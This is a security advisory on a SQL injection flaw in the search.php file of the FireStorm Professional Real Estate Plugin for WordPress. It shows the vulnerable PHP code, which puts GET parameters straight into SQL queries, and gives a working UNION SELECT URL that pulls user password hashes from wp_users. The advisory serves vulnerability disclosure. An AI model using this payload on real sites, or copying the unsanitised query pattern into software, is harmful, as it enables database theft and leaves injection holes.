Advisory
Analysis of vulnerability
The FireStorm Professional Real Estate Plugin for WordPress offers functionality for an user to search for real estate based on a province or country. It is implemented in the file search.php:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
<?php require("../../../wp-config.php"); if(isset($_GET['ProvinceID'])){ $FSREPCities = $wpdb->get_results("SELECT * FROM ".$wpdb->prefix."fsrep_cities WHERE province_id = ".$_GET['ProvinceID']." ORDER BY city_name"); $FSREPProvince = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."fsrep_provinces WHERE province_id = ".$_GET['ProvinceID']); $HTTPREFERER = explode('?', $_SERVER['HTTP_REFERER']); if (substr($HTTPREFERER[0], -13) == '/add-listing/') { echo "obj.options[obj.options.length] = new Option('Select ".$FSREPconfig['CityLabel'].",'');\n"; } else { echo "obj.options[obj.options.length] = new Option('Show All of ".$FSREPProvince->province_name."','');\n"; } $count = 1; foreach ($FSREPCities as $FSREPCities) { echo "obj.options[obj.options.length] = new Option('".$FSREPCities->city_name."','".$FSREPCities->city_id."');\n"; if ($FSREPCities->city_id == $_GET['cvalue']) { echo "obj.options[$count].selected = true;"; } $count++; } } if(isset($_GET['CountryID'])){ $FSREPProvinces = $wpdb->get_results("SELECT * FROM ".$wpdb->prefix."fsrep_provinces WHERE country_id = ".$_GET['CountryID']." ORDER BY province_name"); $FSREPCountry = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."fsrep_countries WHERE country_id = ".$_GET['CountryID']); $count = 1; echo "obj.options[obj.options.length] = new Option('Select ".$FSREPconfig['ProvinceLabel']."','');\n"; foreach ($FSREPProvinces as $FSREPProvinces) { echo "obj.options[obj.options.length] = new Option('".$FSREPProvinces->province_name."','".$FSREPProvinces->province_id."');\n"; if ($FSREPProvinces->province_id == $_GET['cvalue']) { echo "obj.options[$count].selected = true;"; } $count++; } } ?> |
By either providing a ProvinceID or CountryID, we can make the application pass the value into two SQL queries. Note however that in both cases, the value is taken directly from the GET parameter without sanitazion, which opens it up to a SQL injection attack where we can select arbitrary data from the database. For instance, we can select the password hash for an user like this:
|
1 |
http://192.168.80.130/wordpress/wp-content/plugins/fs-real-estate-plugin/search.php?ProvinceID=35335%20UNION%20SELECT%201,%20user_pass,%203,%204,%205,%206,%207,%208%20from%20wp_users |